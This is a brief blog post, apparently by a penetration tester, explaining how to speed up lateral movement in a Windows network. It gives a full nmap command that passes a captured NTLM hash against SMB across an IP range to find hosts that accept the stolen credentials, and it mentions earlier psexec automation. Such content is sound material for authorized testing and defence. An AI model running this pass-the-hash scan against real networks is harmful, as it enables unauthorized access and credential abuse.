Let's speed up pwning the Enterprise another notch. In this scenario, we've obtained an account hash through a Man-in-the-Middle attack using, say, Easy-Creds. In my prior blog posts I showed how to automate a psexec attack across an entire IP range or list. But if the credentials aren't valid on all the targets it can take time to go through the entire range/list, waiting for the authentication to fail, the module to timeout and the 2 second sleep. There has to be a better way and there is.
Nmap supports the use of password hashes:
nmap -n -sT -p445 --script=smb-enum-shares.nse -script-args=smbuser=USER,smbhash=e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c,smbtype=v1,smbdomain=DOMAIN -oN SMB-User.txt 10.110.10.1/24 --open -vv
HINT: To test using the local user password hashes, use "smbdomain=."
For further information:
(Look at smbtype)